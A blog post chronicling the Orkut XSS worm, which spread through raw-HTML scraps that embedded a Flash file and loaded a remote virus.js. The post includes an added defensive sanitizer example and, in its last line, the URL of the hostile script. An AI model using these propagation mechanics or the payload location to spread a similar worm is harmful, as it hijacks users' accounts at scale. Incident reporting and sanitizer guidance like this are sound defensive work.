Orkut XSS

Aftermath: Let’s try to summarize everything here.

  1. On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo’s worm exploited this ‘feature’. It started by scrapping a malicious Flash file. Just viewing this scrap causes the Flash object to load, which in turn loads our favourite virus.js file. The JavaScript code in that file first joins you to the community called Infectados pelo Vírus do Orkut (in English: Infected by the Orkut Virus) and then sends the same Flash file as a scrap to as many people in your friends list as possible. So when each of your friends views their Scrapbook, they in turn start propagating the worm to their friends, and so on.

  2. Friends don’t let friends use raw HTML would be a good maxim for everyone to follow ;-)

  3. It’s fair to say that almost every member of that community was an involuntary signup. So based on the reported peak size of the community, more than 655,000 users were affected.

  4. The attack was apparently without malicious intent and done just to highlight the security problems with such networking sites. Although the motives might be clean, I question the modus operandi. McAfee folks have named this W32/KutWormor.

  5. This post got linked from various places including several bloggers, News.com, ZDNet and Valleywag(!). But, as Valleywag points out, if this had happened on MySpace or Facebook, it would be all over the US media.

  6. No official word from Orkut yet on this except this reply in a forum thread. Amusingly, the list of suggestions offered in that reply to ‘stay safe’ wouldn’t have helped at all with this worm! The worm would have worked anyway unless you had Flash and/or JavaScript disabled.

  7. Curiously enough, the official Orkut blog got a new post during/after this incident but the post says absolutely nothing about what happened!
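Items 1 and 2 above describe the root cause: scraps were rendered as raw HTML, so an `<embed>` pointing at a Flash file (and from there a remote script) could run in every viewer’s session. The usual fix is to render scraps through an allow-list sanitizer instead of echoing the markup. The following is an added example of such a sanitizer, written for this post; it is not Orkut’s code and the tag set, the hypothetical `sanitizeScrap` name and the sample inputs are my own choices.

```javascript
// Allow-list sanitizer for user-supplied scrap markup (added example, not Orkut's code).
// Only a few formatting tags survive, with no attributes; links keep a plain http(s) href
// and nothing else. Everything that is not on the list (embed, object, script, iframe,
// img, event handlers, javascript: URLs) is dropped or escaped into inert text.
const ALLOWED = new Set(["b", "i", "u", "br"]);
const TEXT_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" };

function escapeText(s) {
  return s.replace(/[&<>"]/g, (ch) => TEXT_ESCAPES[ch]);
}

// Returns the href of an <a> tag if it is a plain http(s) URL, otherwise null.
function safeHref(attrs) {
  const m = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i.exec(attrs);
  if (!m) return null;
  const href = (m[1] ?? m[2] ?? m[3] ?? "").trim();
  return /^https?:\/\/[^\s"'<>]+$/i.test(href) ? href : null;
}

function sanitizeScrap(html) {
  // One token per iteration: a tag, a run of text, or a stray "<" that starts no tag.
  const tokenRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)([^>]*)>|[^<]+|</g;
  let out = "";
  let anchorOpen = false;  // only emit </a> for an <a> we actually allowed
  let m;
  while ((m = tokenRe.exec(html)) !== null) {
    const tok = m[0];
    if (tok[0] !== "<" || tok.length === 1) {   // text node or lone "<"
      out += escapeText(tok);
      continue;
    }
    const closing = tok[1] === "/";
    const name = m[1].toLowerCase();
    if (ALLOWED.has(name)) {
      // Attributes are discarded, so onmouseover= and friends cannot survive.
      out += closing ? `</${name}>` : `<${name}>`;
    } else if (name === "a") {
      if (closing) {
        if (anchorOpen) { out += "</a>"; anchorOpen = false; }
        continue;
      }
      const href = safeHref(m[2]);
      if (href) { out += `<a href="${escapeText(href)}" rel="nofollow">`; anchorOpen = true; }
    }
    // Any other tag (embed, object, script, iframe, img, ...) is silently dropped.
  }
  return out;
}
```

Inner text of a dropped tag is kept but escaped, so a `<script>` body becomes visible text rather than executable code.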

That’s the summary and hopefully the last update here! The original post covering this worm follows below.


Someone (maybe Rodrigo Lacerda, see below) seems to have found an XSS attack on Orkut. A piece of JavaScript code, named virus.js and fetched from a myopera location, somehow made its way into my Orkut session and started scrapping everyone possible at break-neck speed. My friends reported Portuguese-language scraps (I initially wrote Spanish; see first comment below) with some Flash content coming from me, while I’ve seen similar scraps in my own Scrapbook.

From my initial Firebug console digging, this code sneaks in when opening the Scrapbook page. The attack code is fetched just after gtalknotifier004.js loads, so perhaps there’s an XSS hole in that script. Not sure though, I’m a JS newbie :-)

For now, don’t log on to Orkut! Or if you use Adblock, just block anything named *virus.js

Does anyone know how the hell I should report such stuff to Orkut? I can’t seem to locate any vulnerability report form in their support pages.

Update: If you’ve blocked the virus.js file, log in and check your communities. You’ll see an extra one! If you aren’t able to unjoin the community, don’t panic. I believe it’s just an automated throttling response by Orkut’s systems to the massive scrapping initiated from our accounts. It should be fixed in a few hours.

Update: The embedded Flash in the notorious scrap (2008 vem ai… que ele comece mto bem para vc) is also part of the exploit. I don’t know exactly what it does since I use Flashblock all the time! Also, some blogs are suggesting changing passwords. I don’t think that’s needed since I don’t believe passwords have been compromised. Of course, don’t treat my opinion as infallible advice; do what you must. I know I’m not changing my password just because of this!

Update: Reader Steve (thanks!) informs me in the comments below that this hole was reported some time back and was already fixed. From this page:

On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.

And the actual report referenced in the above quote: Orkut Group Cross Site Scripting Vulnerability. I don’t know enough to say whether the situation we are seeing today is due to the same vulnerability.

Update: People seem to think that somehow they were responsible for facilitating this attack. Like perhaps they clicked on a bad link or something. From what I understand, this isn’t a phishing attack and there’s nothing you could’ve done to prevent this. Except, maybe, not visiting Orkut.com!

Update: Apparently fixed! The virus.js file is no longer fetched and all the spam scraps in my Scrapbook have disappeared. I could unjoin the ‘special’ community too, which at this point in time has 390,262 members, which means (at least) 390,262 affected users. That’s not good!

Update: More from Reader Steve in the comments. Apparently, the community that we are all involuntarily a part of now is some kind of vigilante community created just to make a point that these systems are insecure. Steve’s comment:

The infected group is called “Infectados pelo Vírus do Orkut” and has nearly 400K members (minus me now).
The group description (loosely translated via Babelfish) is:
In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

Update: Some readers have kindly posted deobfuscated versions of the virus.js script. Thanks! Since they weren’t fitting well in the comments below, I’ve moved them to a pastebin site. See version 1 and version 2. I’ll post some analysis if I get time to do some!

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js
